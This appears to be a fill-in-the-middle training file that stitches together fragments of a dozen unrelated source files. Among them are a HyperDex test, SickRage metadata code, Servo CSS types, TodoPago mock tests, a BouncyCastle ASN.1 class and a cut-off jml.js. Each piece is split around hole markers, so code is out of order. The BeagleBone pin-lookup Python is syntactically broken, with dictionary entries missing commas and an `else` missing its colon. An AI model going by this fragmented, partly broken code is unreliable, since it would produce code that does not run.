self.render<|fim▁end|>
from kirinki.models import streaming
<|file_name|>DataTypeMapIntFloat.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python import sys import hyperdex.client from hyperdex.client import LessEqual, GreaterEqual, Range, Regex, LengthEquals, LengthLessEqual, LengthGreaterEqual c = hyperdex.client.Client(sys.argv[1], int(sys.argv[2])) def to_objectset(xs): return set([frozenset(x.items()) for x in xs]) assert c.put('kv', 'k', {}) == True assert c.get('kv', 'k') == {'v': {}}<|fim▁hole|><|fim▁end|>
assert c.put('kv', 'k', {'v': {1: 3.14, 2: 0.25, 3: 1.0}}) == True assert c.get('kv', 'k') == {'v': {1: 3.14, 2: 0.25, 3: 1.0}} assert c.put('kv', 'k', {'v': {}}) == True assert c.get('kv', 'k') == {'v': {}}
<|file_name|>database.rs<|end_file_name|><|fim▁begin|>// Copyright 2018 Google LLC // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. //! Contains configuration structs for the database. use std::path::PathBuf; use serde::{Deserialize, Serialize}; /// Configuration parameters for the Sqlite Database. #[derive(Serialize, Deserialize, Debug, Clone)] #[serde(default)] pub struct DatabaseConfig { /// The path to the SqliteDatabase to use. If set, the parent directory must exist and the /// location must be writable. Saver will never fall back to an in-memory database if this is /// set. #[serde(skip_serializing_if = "Option::is_none")] pub database_path: Option<PathBuf>, /// Sets the cap for the number of scenarios to keep in the database. Set to None for /// unlimited. Defaults to 1,000,000. #[serde(skip_serializing_if = "Option::is_none")] pub max_scenarios_to_keep: Option<u64>, /// How often (in seconds) to prune excess scenarios while running normally. Defaults to every /// 20 minutes (1200 seconds). Regardless of what this is set to, it will always prune on /// shutdown unless max_scenarios_to_keep is unset. pub prune_interval_seconds: u64, } impl Default for DatabaseConfig { fn default() -> Self { DatabaseConfig { database_path: None, max_scenarios_to_keep: Some(1000000), prune_interval_seconds: 1200,<|fim▁hole|><|fim▁end|>
} } }
<|file_name|>bower.js<|end_file_name|><|fim▁begin|>var gulp = require('gulp'), config = require('../config'), mergeStream = require('merge-stream'), mainBowerFiles = require('main-bower-files'), flatten = require('gulp-flatten'), rename = require("gulp-rename"), bowerRequireJS = require('bower-requirejs'), wiredep = require('wiredep').stream; <|fim▁hole|> return gulp.src(config.sass.src) .pipe(wiredep({ exclude: ['jquery'], })) .pipe(gulp.dest(config.sass.srcPath)) }); gulp.task('bower:scripts', function(cb) { var options = { baseURL: config.scripts.srcPath, config: config.scripts.src, exclude: ['jquery'], transitive: true }; bowerRequireJS(options, function (rjsConfigFromBower) { console.info('------> Updated paths config in '+options.config); cb(); }) });<|fim▁end|>
gulp.task('bower:styles', function() {
<|file_name|>mediabrowser.py<|end_file_name|><|fim▁begin|># Author: Nic Wolfe <[email protected]> # URL: http://code.google.com/p/sickbeard/ # # This file is part of SickRage. # # SickRage is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # SickRage is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with SickRage. If not, see <http://www.gnu.org/licenses/>. import datetime import os import re import sickbeard import generic from sickbeard import logger, exceptions, helpers from sickbeard import encodingKludge as ek from sickbeard.exceptions import ex import xml.etree.cElementTree as etree class MediaBrowserMetadata(generic.GenericMetadata): """ Metadata generation class for Media Browser 2.x/3.x - Standard Mode. The following file structure is used: show_root/series.xml (show metadata) show_root/folder.jpg (poster) show_root/backdrop.jpg (fanart) show_root/Season ##/folder.jpg (season thumb) show_root/Season ##/filename.ext (*) show_root/Season ##/metadata/filename.xml (episode metadata) show_root/Season ##/metadata/filename.jpg (episode thumb) """ def __init__(self, show_metadata=False, episode_metadata=False, fanart=False, poster=False, banner=False, episode_thumbnails=False, season_posters=False, season_banners=False, season_all_poster=False, season_all_banner=False): generic.GenericMetadata.__init__(self, show_metadata, episode_metadata, fanart, poster, banner, episode_thumbnails, season_posters, season_banners, season_all_poster, season_all_banner) self.name = 'MediaBrowser' self._ep_nfo_extension = 'xml' self._show_metadata_filename = 'series.xml' self.fanart_name = "backdrop.jpg" self.poster_name = "folder.jpg" # web-ui metadata template self.eg_show_metadata = "series.xml" self.eg_episode_metadata = "Season##\\metadata\\<i>filename</i>.xml" self.eg_fanart = "backdrop.jpg" self.eg_poster = "folder.jpg" self.eg_banner = "banner.jpg" self.eg_episode_thumbnails = "Season##\\metadata\\<i>filename</i>.jpg" self.eg_season_posters = "Season##\\folder.jpg" self.eg_season_banners = "Season##\\banner.jpg" self.eg_season_all_poster = "<i>not supported</i>" self.eg_season_all_banner = "<i>not supported</i>" # Override with empty methods for unsupported features def retrieveShowMetadata(self, folder): # while show metadata is generated, it is not supported for our lookup return (None, None, None) def create_season_all_poster(self, show_obj): pass def create_season_all_banner(self, show_obj): pass def get_episode_file_path(self, ep_obj): """ Returns a full show dir/metadata/episode.xml path for MediaBrowser episode metadata files ep_obj: a TVEpisode object to get the path for """ if ek.ek(os.path.isfile, ep_obj.location): xml_file_name = helpers.replaceExtension(ek.ek(os.path.basename, ep_obj.location), self._ep_nfo_extension) metadata_dir_name = ek.ek(os.path.join, ek.ek(os.path.dirname, ep_obj.location), 'metadata') xml_file_path = ek.ek(os.path.join, metadata_dir_name, xml_file_name) else: logger.log(u"Episode location doesn't exist: " + str(ep_obj.location), logger.DEBUG) return '' return xml_file_path def get_episode_thumb_path(self, ep_obj): """ Returns a full 
show dir/metadata/episode.jpg path for MediaBrowser episode thumbs. ep_obj: a TVEpisode object to get the path from """ if ek.ek(os.path.isfile, ep_obj.location): tbn_file_name = helpers.replaceExtension(ek.ek(os.path.basename, ep_obj.location), 'jpg') metadata_dir_name = ek.ek(os.path.join, ek.ek(os.path.dirname, ep_obj.location), 'metadata') tbn_file_path = ek.ek(os.path.join, metadata_dir_name, tbn_file_name) else: return None return tbn_file_path def get_season_poster_path(self, show_obj, season): """ Season thumbs for MediaBrowser go in Show Dir/Season X/folder.jpg If no season folder exists, None is returned """ dir_list = [x for x in ek.ek(os.listdir, show_obj.location) if ek.ek(os.path.isdir, ek.ek(os.path.join, show_obj.location, x))] season_dir_regex = '^Season\s+(\d+)$' season_dir = None for cur_dir in dir_list: # MediaBrowser 1.x only supports 'Specials' # MediaBrowser 2.x looks to only support 'Season 0' # MediaBrowser 3.x looks to mimic KODI/Plex support if season == 0 and cur_dir == "Specials": season_dir = cur_dir break match = re.match(season_dir_regex, cur_dir, re.I) if not match: continue cur_season = int(match.group(1)) if cur_season == season: season_dir = cur_dir break if not season_dir: logger.log(u"Unable to find a season dir for season " + str(season), logger.DEBUG) return None logger.log(u"Using " + str(season_dir) + "/folder.jpg as season dir for season " + str(season), logger.DEBUG) return ek.ek(os.path.join, show_obj.location, season_dir, 'folder.jpg') def get_season_banner_path(self, show_obj, season): """ Season thumbs for MediaBrowser go in Show Dir/Season X/banner.jpg If no season folder exists, None is returned """ dir_list = [x for x in ek.ek(os.listdir, show_obj.location) if ek.ek(os.path.isdir, ek.ek(os.path.join, show_obj.location, x))] season_dir_regex = '^Season\s+(\d+)$' season_dir = None for cur_dir in dir_list: # MediaBrowser 1.x only supports 'Specials' # MediaBrowser 2.x looks to only support 'Season 0' # MediaBrowser 3.x looks to mimic KODI/Plex support if season == 0 and cur_dir == "Specials": season_dir = cur_dir break match = re.match(season_dir_regex, cur_dir, re.I) if not match: continue cur_season = int(match.group(1)) if cur_season == season: season_dir = cur_dir break if not season_dir: logger.log(u"Unable to find a season dir for season " + str(season), logger.DEBUG) return None logger.log(u"Using " + str(season_dir) + "/banner.jpg as season dir for season " + str(season), logger.DEBUG) return ek.ek(os.path.join, show_obj.location, season_dir, 'banner.jpg') def _show_data(self, show_obj): """ Creates an elementTree XML structure for a MediaBrowser-style series.xml returns the resulting data object. 
show_obj: a TVShow instance to create the NFO for """ indexer_lang = show_obj.lang # There's gotta be a better way of doing this but we don't wanna # change the language value elsewhere lINDEXER_API_PARMS = sickbeard.indexerApi(show_obj.indexer).api_params.copy() lINDEXER_API_PARMS['actors'] = True if indexer_lang and not indexer_lang == 'en': lINDEXER_API_PARMS['language'] = indexer_lang if show_obj.dvdorder != 0: lINDEXER_API_PARMS['dvdorder'] = True t = sickbeard.indexerApi(show_obj.indexer).indexer(**lINDEXER_API_PARMS) tv_node = etree.Element("Series") try: myShow = t[int(show_obj.indexerid)] except sickbeard.indexer_shownotfound: logger.log(u"Unable to find show with id " + str(show_obj.indexerid) + " on " + sickbeard.indexerApi( show_obj.indexer).name + ", skipping it", logger.ERROR) raise except sickbeard.indexer_error: logger.log( u"" + sickbeard.indexerApi(show_obj.indexer).name + " is down, can't use its data to make the NFO", logger.ERROR) raise # check for title and id if getattr(myShow, 'seriesname', None) is None or getattr(myShow, 'id', None) is None: logger.log(u"Incomplete info for show with id " + str(show_obj.indexerid) + " on " + sickbeard.indexerApi( show_obj.indexer).name + ", skipping it", logger.ERROR) return False indexerid = etree.SubElement(tv_node, "id") if getattr(myShow, 'id', None) is not None: indexerid.text = str(myShow['id']) indexer = etree.SubElement(tv_node, "indexer") if show_obj.indexer != None: indexer.text = str(show_obj.indexer) SeriesName = etree.SubElement(tv_node, "SeriesName") if getattr(myShow, 'seriesname', None) is not None: SeriesName.text = myShow['seriesname'] Status = etree.SubElement(tv_node, "Status") if getattr(myShow, 'status', None) is not None: Status.text = myShow['status'] Network = etree.SubElement(tv_node, "Network") if getattr(myShow, 'network', None) is not None: Network.text = myShow['network'] Airs_Time = etree.SubElement(tv_node, "Airs_Time") if getattr(myShow, 'airs_time', None) is not None: Airs_Time.text = myShow['airs_time'] Airs_DayOfWeek = etree.SubElement(tv_node, "Airs_DayOfWeek") if getattr(myShow, 'airs_dayofweek', None) is not None: Airs_DayOfWeek.text = myShow['airs_dayofweek'] FirstAired = etree.SubElement(tv_node, "FirstAired") if getattr(myShow, 'firstaired', None) is not None: FirstAired.text = myShow['firstaired'] ContentRating = etree.SubElement(tv_node, "ContentRating") MPAARating = etree.SubElement(tv_node, "MPAARating") certification = etree.SubElement(tv_node, "certification") if getattr(myShow, 'contentrating', None) is not None: ContentRating.text = myShow['contentrating'] MPAARating.text = myShow['contentrating'] certification.text = myShow['contentrating'] MetadataType = etree.SubElement(tv_node, "Type") MetadataType.text = "Series" Overview = etree.SubElement(tv_node, "Overview") if getattr(myShow, 'overview', None) is not None: Overview.text = myShow['overview'] PremiereDate = etree.SubElement(tv_node, "PremiereDate") if getattr(myShow, 'firstaired', None) is not None: PremiereDate.text = myShow['firstaired'] Rating = etree.SubElement(tv_node, "Rating") if getattr(myShow, 'rating', None) is not None: Rating.text = myShow['rating'] ProductionYear = etree.SubElement(tv_node, "ProductionYear") if getattr(myShow, 'firstaired', None) is not None: try: year_text = str(datetime.datetime.strptime(myShow['firstaired'], '%Y-%m-%d').year) if year_text: ProductionYear.text = year_text except: pass RunningTime = etree.SubElement(tv_node, "RunningTime") Runtime = etree.SubElement(tv_node, "Runtime") if 
getattr(myShow, 'runtime', None) is not None: RunningTime.text = myShow['runtime'] Runtime.text = myShow['runtime'] IMDB_ID = etree.SubElement(tv_node, "IMDB_ID") IMDB = etree.SubElement(tv_node, "IMDB") IMDbId = etree.SubElement(tv_node, "IMDbId") if getattr(myShow, 'imdb_id', None) is not None: IMDB_ID.text = myShow['imdb_id'] IMDB.text = myShow['imdb_id'] IMDbId.text = myShow['imdb_id'] Zap2ItId = etree.SubElement(tv_node, "Zap2ItId") if getattr(myShow, 'zap2it_id', None) is not None: Zap2ItId.text = myShow['zap2it_id'] Genres = etree.SubElement(tv_node, "Genres") for genre in myShow['genre'].split('|'): if genre: cur_genre = etree.SubElement(Genres, "Genre") cur_genre.text = genre Genre = etree.SubElement(tv_node, "Genre") if getattr(myShow, 'genre', None) is not None: Genre.text = "|".join([x for x in myShow["genre"].split('|') if x]) Studios = etree.SubElement(tv_node, "Studios") Studio = etree.SubElement(Studios, "Studio") if getattr(myShow, 'network', None) is not None: Studio.text = myShow['network'] Persons = etree.SubElement(tv_node, "Persons") if getattr(myShow, 'actors', None) is not None: for actor in myShow['_actors']: cur_actor = etree.SubElement(Persons, "Person") cur_actor_name = etree.SubElement(cur_actor, "Name") if getattr(actor, 'name', None): cur_actor_name.text = actor['name'].strip() cur_actor_type = etree.SubElement(cur_actor, "Type") cur_actor_type.text = "Actor" cur_actor_role = etree.SubElement(cur_actor, "Role") if getattr(actor, 'role', None): cur_actor_role.text = actor['role'] helpers.indentXML(tv_node) data = etree.ElementTree(tv_node) return data def _ep_data(self, ep_obj): """ Creates an elementTree XML structure for a MediaBrowser style episode.xml and returns the resulting data object. show_obj: a TVShow instance to create the NFO for """ eps_to_write = [ep_obj] + ep_obj.relatedEps persons_dict = {} persons_dict['Director'] = [] persons_dict['GuestStar'] = [] persons_dict['Writer'] = [] indexer_lang = ep_obj.show.lang try: lINDEXER_API_PARMS = sickbeard.indexerApi(ep_obj.show.indexer).api_params.copy() lINDEXER_API_PARMS['actors'] = True if indexer_lang and not indexer_lang == 'en': lINDEXER_API_PARMS['language'] = indexer_lang if ep_obj.show.dvdorder != 0: lINDEXER_API_PARMS['dvdorder'] = True t = sickbeard.indexerApi(ep_obj.show.indexer).indexer(**lINDEXER_API_PARMS)<|fim▁hole|> myShow = t[ep_obj.show.indexerid] except sickbeard.indexer_shownotfound, e: raise exceptions.ShowNotFoundException(e.message) except sickbeard.indexer_error, e: logger.log(u"Unable to connect to " + sickbeard.indexerApi( ep_obj.show.indexer).name + " while creating meta files - skipping - " + ex(e), logger.ERROR) return False rootNode = etree.Element("Item") # write an MediaBrowser XML containing info for all matching episodes for curEpToWrite in eps_to_write: try: myEp = myShow[curEpToWrite.season][curEpToWrite.episode] except (sickbeard.indexer_episodenotfound, sickbeard.indexer_seasonnotfound): logger.log(u"Unable to find episode " + str(curEpToWrite.season) + "x" + str( curEpToWrite.episode) + " on " + sickbeard.indexerApi( ep_obj.show.indexer).name + ".. has it been removed? 
Should I delete from db?") return None if curEpToWrite == ep_obj: # root (or single) episode # default to today's date for specials if firstaired is not set if getattr(myEp, 'firstaired', None) is None and ep_obj.season == 0: myEp['firstaired'] = str(datetime.date.fromordinal(1)) if getattr(myEp, 'episodename', None) is None or getattr(myEp, 'firstaired', None) is None: return None episode = rootNode EpisodeName = etree.SubElement(episode, "EpisodeName") if curEpToWrite.name != None: EpisodeName.text = curEpToWrite.name else: EpisodeName.text = "" EpisodeNumber = etree.SubElement(episode, "EpisodeNumber") EpisodeNumber.text = str(ep_obj.episode) if ep_obj.relatedEps: EpisodeNumberEnd = etree.SubElement(episode, "EpisodeNumberEnd") EpisodeNumberEnd.text = str(curEpToWrite.episode) SeasonNumber = etree.SubElement(episode, "SeasonNumber") SeasonNumber.text = str(curEpToWrite.season) if not ep_obj.relatedEps: absolute_number = etree.SubElement(episode, "absolute_number") if getattr(myEp, 'absolute_number', None) is not None: absolute_number.text = myEp['absolute_number'] FirstAired = etree.SubElement(episode, "FirstAired") if curEpToWrite.airdate != datetime.date.fromordinal(1): FirstAired.text = str(curEpToWrite.airdate) else: FirstAired.text = "" MetadataType = etree.SubElement(episode, "Type") MetadataType.text = "Episode" Overview = etree.SubElement(episode, "Overview") if curEpToWrite.description != None: Overview.text = curEpToWrite.description else: Overview.text = "" if not ep_obj.relatedEps: Rating = etree.SubElement(episode, "Rating") if getattr(myEp, 'rating', None) is not None: Rating.text = myEp['rating'] IMDB_ID = etree.SubElement(episode, "IMDB_ID") IMDB = etree.SubElement(episode, "IMDB") IMDbId = etree.SubElement(episode, "IMDbId") if getattr(myShow, 'imdb_id', None) is not None: IMDB_ID.text = myShow['imdb_id'] IMDB.text = myShow['imdb_id'] IMDbId.text = myShow['imdb_id'] indexerid = etree.SubElement(episode, "id") indexerid.text = str(curEpToWrite.indexerid) indexer = etree.SubElement(episode, "indexer") indexer.text = str(curEpToWrite.show.indexer) Persons = etree.SubElement(episode, "Persons") Language = etree.SubElement(episode, "Language") try: Language.text = myEp['language'] except: Language.text = 'en' # tvrage api doesn't provide language so we must assume a value here thumb = etree.SubElement(episode, "filename") # TODO: See what this is needed for.. 
if its still needed # just write this to the NFO regardless of whether it actually exists or not # note: renaming files after nfo generation will break this, tough luck thumb_text = self.get_episode_thumb_path(ep_obj) if thumb_text: thumb.text = thumb_text else: # append data from (if any) related episodes EpisodeNumberEnd.text = str(curEpToWrite.episode) if curEpToWrite.name: if not EpisodeName.text: EpisodeName.text = curEpToWrite.name else: EpisodeName.text = EpisodeName.text + ", " + curEpToWrite.name if curEpToWrite.description: if not Overview.text: Overview.text = curEpToWrite.description else: Overview.text = Overview.text + "\r" + curEpToWrite.description # collect all directors, guest stars and writers if getattr(myEp, 'director', None) is not None: persons_dict['Director'] += [x.strip() for x in myEp['director'].split('|') if x] if getattr(myEp, 'gueststars', None) is not None: persons_dict['GuestStar'] += [x.strip() for x in myEp['gueststars'].split('|') if x] if getattr(myEp, 'writer', None) is not None: persons_dict['Writer'] += [x.strip() for x in myEp['writer'].split('|') if x] # fill in Persons section with collected directors, guest starts and writers for person_type, names in persons_dict.iteritems(): # remove doubles names = list(set(names)) for cur_name in names: Person = etree.SubElement(Persons, "Person") cur_person_name = etree.SubElement(Person, "Name") cur_person_name.text = cur_name cur_person_type = etree.SubElement(Person, "Type") cur_person_type.text = person_type helpers.indentXML(rootNode) data = etree.ElementTree(rootNode) return data # present a standard "interface" from the module metadata_class = MediaBrowserMetadata<|fim▁end|>
<|file_name|>position.rs<|end_file_name|><|fim▁begin|>/* This Source Code Form is subject to the terms of the Mozilla Public * License, v. 2.0. If a copy of the MPL was not distributed with this * file, You can obtain one at http://mozilla.org/MPL/2.0/. */ //! Generic types for CSS handling of specified and computed values of //! [`position`](https://drafts.csswg.org/css-backgrounds-3/#position) /// A generic type for representing a CSS [position](https://drafts.csswg.org/css-values/#position). #[derive(Animate, Clone, ComputeSquaredDistance, Copy, Debug, MallocSizeOf, PartialEq, ToAnimatedZero, ToComputedValue)] pub struct Position<H, V> { /// The horizontal component of position. pub horizontal: H, /// The vertical component of position. pub vertical: V, } impl<H, V> Position<H, V> { /// Returns a new position. pub fn new(horizontal: H, vertical: V) -> Self { Self { horizontal: horizontal, vertical: vertical, } } } /// A generic value for the `z-index` property. #[derive(Animate, Clone, ComputeSquaredDistance, Copy, Debug, MallocSizeOf, PartialEq, ToAnimatedZero, ToComputedValue, ToCss)] pub enum ZIndex<Integer> { /// An integer value. Integer(Integer), /// The keyword `auto`. Auto, } impl<Integer> ZIndex<Integer> { /// Returns `auto` #[inline] pub fn auto() -> Self { ZIndex::Auto } <|fim▁hole|> /// Returns whether `self` is `auto`. #[inline] pub fn is_auto(self) -> bool { matches!(self, ZIndex::Auto) } /// Returns the integer value if it is an integer, or `auto`. #[inline] pub fn integer_or(self, auto: Integer) -> Integer { match self { ZIndex::Integer(n) => n, ZIndex::Auto => auto, } } }<|fim▁end|>
<|file_name|>cssmin.js<|end_file_name|><|fim▁begin|>'use strict'; var path = require('path'); exports.name = 'cssmin'; // // Output a config for the furnished block // The context variable is used both to take the files to be treated // (inFiles) and to output the one(s) created (outFiles). // It aslo conveys whether or not the current process is the last of the pipe // exports.createConfig = function(context, block) { var cfg = {files: []}; // FIXME: check context has all the needed info var outfile = path.join(context.outDir, block.dest); // Depending whether or not we're the last of the step we're not going to output the same thing var files = {}; files.dest = outfile; files.src = [];<|fim▁hole|> context.outFiles = [block.dest]; return cfg; };<|fim▁end|>
context.inFiles.forEach(function(f) { files.src.push(path.join(context.inDir, f));} ); cfg.files.push(files);
<|file_name|>beaglebone-black.py<|end_file_name|><|fim▁begin|># # Get the pin which correlates with a given purpose. # # @param char array purpose # The purpose to search by. # @return int # A pin which can be used for the given purpose. # def getPin(purpose): purpose_collection = { "i2c-data": 20<|fim▁hole|> "adc": 39 "adc0": 39 "adc-0": 39 "one-wire-data": 40 "adc1": 40 "adc-1": 40 "spi-slave-select": 28 "spi-master-out-slave-in": 30 "spi-master-in-slave-out": 29 "spi-clock": 31 } if purpose in purpose_collection: return purpose_collection[purpose] else return -1<|fim▁end|>
"i2c-clock": 19
<|file_name|>PSYM_ENUMERATESYMBOLS_CALLBACK.hpp<|end_file_name|><|fim▁begin|><|fim▁hole|>#pragma once #include <common/common.h> START_ATF_NAMESPACE typedef int (WINAPIV *PSYM_ENUMERATESYMBOLS_CALLBACK)(_SYMBOL_INFO *, unsigned int, void *); END_ATF_NAMESPACE<|fim▁end|>
// This file auto generated by plugin for ida pro. Generated code only for x64. Please, dont change manually
<|file_name|>SendAuthorizeRequestTest.py<|end_file_name|><|fim▁begin|># pylint: disable-all
# flake8: noqa
import sys
sys.path.append("..")
from todopagoconnector import TodoPagoConnector
from SendAuthorizeRequestData import SendAuthorizeRequestData
import unittest
from unittest import TestCase

if sys.version_info[0] >= 3:
    from unittest.mock import patch, Mock
else:
    from mock import patch, Mock, MagicMock


class SendAuthorizeRequestTest(TestCase):

    @patch('todopagoconnector.TodoPagoConnector')
    def test_get_credentials_ok(self, MockTodoPagoConnector):
        j_header_http = {
            'Authorization': 'TODOPAGO f3d8b72c94ab4a06be2ef7c95490f7d3'
        }
        MTPConnector = MockTodoPagoConnector(j_header_http, "test")
        instanceSARData = SendAuthorizeRequestData()
        MTPConnector.sendAuthorize.return_value = instanceSARData.send_authorize_request_ok_response()
        responseSAR = MTPConnector.sendAuthorize(
            instanceSARData.get_options_SAR_comercio_params(),
            instanceSARData.get_options_SAR_operation_params())
        self.assertEqual(responseSAR['StatusCode'], -1)

    @patch('todopagoconnector.TodoPagoConnector')
    def test_get_credentials_fail(self, MockTodoPagoConnector):
        j_header_http = {
            'Authorization': 'TODOPAGO f3d8b72c94ab4a06be2ef7c95490f7d3'
        }
        MTPConnector = MockTodoPagoConnector(j_header_http, "test")
        instanceSAR = SendAuthorizeRequestData()
        MTPConnector.sendAuthorize.return_value = instanceSAR.send_authorize_request_fail_response()
        responseSAR = MTPConnector.sendAuthorize(
            instanceSAR.get_options_SAR_comercio_params(),<|fim▁hole|>
    @patch('todopagoconnector.TodoPagoConnector')
    def test_get_credentials_702(self, MockTodoPagoConnector):
        j_header_http = {
            'Authorization': 'TODOPAGO f3d8b72c94ab4a06be2ef7c95490f7d3'
        }
        MTPConnector = MockTodoPagoConnector(j_header_http, "test")
        instanceSAR = SendAuthorizeRequestData()
        MTPConnector.sendAuthorize.return_value = instanceSAR.send_authorize_request_702_response()
        responseSAR = MTPConnector.sendAuthorize(
            instanceSAR.get_options_SAR_comercio_params(),
            instanceSAR.get_options_SAR_operation_params())
        self.assertNotEqual(responseSAR['StatusCode'], -1)


if __name__ == '__main__':
    unittest.main()<|fim▁end|>
            instanceSAR.get_options_SAR_operation_params())
        self.assertNotEqual(responseSAR['StatusCode'], -1)
<|file_name|>EncryptedData.java<|end_file_name|><|fim▁begin|>package org.bouncycastle.asn1.cms; import org.bouncycastle.asn1.ASN1EncodableVector; import org.bouncycastle.asn1.ASN1Integer; import org.bouncycastle.asn1.ASN1Object; import org.bouncycastle.asn1.ASN1Primitive; import org.bouncycastle.asn1.ASN1Sequence; import org.bouncycastle.asn1.ASN1Set; import org.bouncycastle.asn1.BERSequence; import org.bouncycastle.asn1.BERTaggedObject; public class EncryptedData extends ASN1Object { private ASN1Integer version; private EncryptedContentInfo encryptedContentInfo; private ASN1Set unprotectedAttrs; public static EncryptedData getInstance(Object o) { if (o instanceof EncryptedData) { return (EncryptedData)o; } if (o != null) { return new EncryptedData(ASN1Sequence.getInstance(o)); } return null; } public EncryptedData(EncryptedContentInfo encInfo) { this(encInfo, null); } public EncryptedData(EncryptedContentInfo encInfo, ASN1Set unprotectedAttrs) { this.version = new ASN1Integer((unprotectedAttrs == null) ? 0 : 2); this.encryptedContentInfo = encInfo; this.unprotectedAttrs = unprotectedAttrs; } private EncryptedData(ASN1Sequence seq) { this.version = ASN1Integer.getInstance(seq.getObjectAt(0)); this.encryptedContentInfo = EncryptedContentInfo.getInstance(seq.getObjectAt(1)); if (seq.size() == 3) { this.unprotectedAttrs = ASN1Set.getInstance(seq.getObjectAt(2)); } } public ASN1Integer getVersion() { return version; } public EncryptedContentInfo getEncryptedContentInfo() { return encryptedContentInfo; } public ASN1Set getUnprotectedAttrs() { return unprotectedAttrs; } <|fim▁hole|> * EncryptedData ::= SEQUENCE { * version CMSVersion, * encryptedContentInfo EncryptedContentInfo, * unprotectedAttrs [1] IMPLICIT UnprotectedAttributes OPTIONAL } * </pre> * @return a basic ASN.1 object representation. */ public ASN1Primitive toASN1Primitive() { ASN1EncodableVector v = new ASN1EncodableVector(); v.add(version); v.add(encryptedContentInfo); if (unprotectedAttrs != null) { v.add(new BERTaggedObject(false, 1, unprotectedAttrs)); } return new BERSequence(v); } }<|fim▁end|>
/** * <pre>
<|file_name|>jml.js<|end_file_name|><|fim▁begin|>var _typeof = typeof Symbol === "function" && typeof Symbol.iterator === "symbol" ? function (obj) { return typeof obj; } : function (obj) { return obj && typeof Symbol === "function" && obj.constructor === Symbol && obj !== Symbol.prototype ? "symbol" : typeof obj; }; var classCallCheck = function (instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError("Cannot call a class as a function"); } }; var createClass = function () { function defineProperties(target, props) { for (var i = 0; i < props.length; i++) { var descriptor = props[i]; descriptor.enumerable = descriptor.enumerable || false; descriptor.configurable = true; if ("value" in descriptor) descriptor.writable = true; Object.defineProperty(target, descriptor.key, descriptor); } } return function (Constructor, protoProps, staticProps) { if (protoProps) defineProperties(Constructor.prototype, protoProps); if (staticProps) defineProperties(Constructor, staticProps); return Constructor; }; }(); var get = function get(object, property, receiver) { if (object === null) object = Function.prototype; var desc = Object.getOwnPropertyDescriptor(object, property); if (desc === undefined) { var parent = Object.getPrototypeOf(object); if (parent === null) { return undefined; } else { return get(parent, property, receiver); } } else if ("value" in desc) { return desc.value; } else { var getter = desc.get; if (getter === undefined) { return undefined; } return getter.call(receiver); } }; var inherits = function (subClass, superClass) { if (typeof superClass !== "function" && superClass !== null) { throw new TypeError("Super expression must either be null or a function, not " + typeof superClass); } subClass.prototype = Object.create(superClass && superClass.prototype, { constructor: { value: subClass, enumerable: false, writable: true, configurable: true } }); if (superClass) Object.setPrototypeOf ? Object.setPrototypeOf(subClass, superClass) : subClass.__proto__ = superClass; }; var possibleConstructorReturn = function (self, call) { if (!self) { throw new ReferenceError("this hasn't been initialised - super() hasn't been called"); } return call && (typeof call === "object" || typeof call === "function") ? call : self; }; var slicedToArray = function () { function sliceIterator(arr, i) { var _arr = []; var _n = true; var _d = false; var _e = undefined; try { for (var _i = arr[Symbol.iterator](), _s; !(_n = (_s = _i.next()).done); _n = true) { _arr.push(_s.value); if (i && _arr.length === i) break; } } catch (err) { _d = true; _e = err; } finally { try { if (!_n && _i["return"]) _i["return"](); } finally { if (_d) throw _e; } } return _arr; } return function (arr, i) { if (Array.isArray(arr)) { return arr; } else if (Symbol.iterator in Object(arr)) { return sliceIterator(arr, i); } else { throw new TypeError("Invalid attempt to destructure non-iterable instance"); } }; }(); var toConsumableArray = function (arr) { if (Array.isArray(arr)) { for (var i = 0, arr2 = Array(arr.length); i < arr.length; i++) arr2[i] = arr[i]; return arr2; } else { return Array.from(arr); } }; /* Possible todos: 0. Add XSLT to JML-string stylesheet (or even vice versa) 0. IE problem: Add JsonML code to handle name attribute (during element creation) 0. Element-specific: IE object-param handling Todos inspired by JsonML: https://github.com/mckamey/jsonml/blob/master/jsonml-html.js 0. duplicate attributes? 0. expand ATTR_MAP 0. 
equivalent of markup, to allow strings to be embedded within an object (e.g., {$value: '<div>id</div>'}); advantage over innerHTML in that it wouldn't need to work as the entire contents (nor destroy any existing content or handlers) 0. More validation? 0. JsonML DOM Level 0 listener 0. Whitespace trimming? JsonML element-specific: 0. table appending 0. canHaveChildren necessary? (attempts to append to script and img) Other Todos: 0. Note to self: Integrate research from other jml notes 0. Allow Jamilih to be seeded with an existing element, so as to be able to add/modify attributes and children 0. Allow array as single first argument 0. Settle on whether need to use null as last argument to return array (or fragment) or other way to allow appending? Options object at end instead to indicate whether returning array, fragment, first element, etc.? 0. Allow building of generic XML (pass configuration object) 0. Allow building content internally as a string (though allowing DOM methods, etc.?) 0. Support JsonML empty string element name to represent fragments? 0. Redo browser testing of jml (including ensuring IE7 can work even if test framework can't work) */ var win = typeof window !== 'undefined' && window; var doc = typeof document !== 'undefined' && document; var XmlSerializer = typeof XMLSerializer !== 'undefined' && XMLSerializer; // STATIC PROPERTIES var possibleOptions = ['$plugins', '$map' // Add any other options here ]; var NS_HTML = 'http://www.w3.org/1999/xhtml', hyphenForCamelCase = /-([a-z])/g; var ATTR_MAP = { 'readonly': 'readOnly' }; // We define separately from ATTR_DOM for clarity (and parity with JsonML) but no current need // We don't set attribute esp. for boolean atts as we want to allow setting of `undefined` // (e.g., from an empty variable) on templates to have no effect var BOOL_ATTS = ['checked', 'defaultChecked', 'defaultSelected', 'disabled', 'indeterminate', 'open', // Dialog elements 'readOnly', 'selected']; var ATTR_DOM = BOOL_ATTS.concat([// From JsonML 'accessKey', // HTMLElement 'async', 'autocapitalize', // HTMLElement 'autofocus', 'contentEditable', // HTMLElement through ElementContentEditable 'defaultValue', 'defer', 'draggable', // HTMLElement 'formnovalidate', 'hidden', // HTMLElement 'innerText', // HTMLElement 'inputMode', // HTMLElement through 